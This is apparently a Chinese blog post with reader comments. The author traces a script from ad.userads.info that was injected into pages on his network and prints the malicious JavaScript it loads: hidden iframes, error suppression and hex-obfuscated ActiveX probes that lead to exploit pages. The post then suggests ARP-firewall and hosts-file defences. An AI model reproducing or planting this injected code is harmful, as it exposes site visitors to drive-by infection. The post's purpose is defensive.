当打开某个新的域名是,偶尔网页会出现如下代码,代码在网页中出现的位置不固定,有时候在网页头部,有时候在body内,难道是所在的局域网中毒?
<script language="javascript" SRC="http://ad.userads.info/ads.js"></script>追踪http://ad.userads.info/ads.js
会出现如代码:
document.writeln("<script>");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://ad.userads.info/in.htm\">
<\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("<\/script>");
document.writeln("<script>window.onerror=function(){return true;}<\/script>")还没有时间分析这个js代码有啥危害,不过感觉应该不是什么好动西!现在的病毒真是无孔不入啊!
使用firefox和chrome都会出现,看来不是浏览器的问题!
继续追踪:http://ad.userads.info/in.htm
<script>
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
document.write("<iframe width=20 height=0 src=re10.htm></iframe>");
document.write("<iframe width=20 height=0 src=uu.htm></iframe>");
try{var f;
var gw=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var m;
var gw=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6C\x2E\x49\x45\x52\x50\x43\x74\x6C\x2E\x31");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=re11.htm></iframe>");}}
</script>
<iframe width=100 height=0 src=flash.htm></iframe>
<iframe width=100 height=0 src=sina.htm></iframe>
<iframe width=100 height=0 src=office.htm></iframe>
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/695113/ystat.js"></script><noscript>
<a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/695113/ystat.gif"/></a>
</noscript>这个里面所有文件就是木马程序,幸亏使用firefox上网,要是ie肯定就中招了!唉!垃圾木马制造者!你们真是垃圾中的战斗机啊!
这个病毒看来是ARP攻击了,这种木马一旦局域网内的一台机器中毒了,这个机器会攻击路由器或者网关,模拟路由器或者网关的mac地址,向局域网内的所有机器发送病毒代码,也就是说这台机器模拟了路由器或者网关,当你上网的时候需要经过路由器或者网关,而冒充的网关就给你网页代码路过的时候增加了病毒代码。这样你打开的每个网页都可能有病毒。遇到这种情况你需要安装arp防火墙,这里有免费的,就是360ARP防火墙。
安装后的防火墙能够过滤冒牌的路由器或者网关发送过来的病毒代码,使得你的上网安全。在这里想免费的360致敬!
第二种解决办法:在本地host表中,将ad.userads.info解析到本机ip:127.0.0.1这样即使你的机器遇到了这个木马代码,木马也无法下载病毒到你的本机,从而保证了你本地机器的安全。这种解决措施也是目前360软件的解决方案。
7 Comments
这个就是我要提问的了,你怎么发现这个代码的?我也好预防这样的问题发生呢,一定要告诉我方法。
垃圾中的战斗机!哈哈!
这个木马是用来干吗的?还挂着yahoo统计的代码?
通通往上看!
真惨,你一直在Pk……
真的无语了,木马当道,天下何以太平啊!
狭路相逢,勇者胜。我们支持你,伟大的斗士!
Post a Comment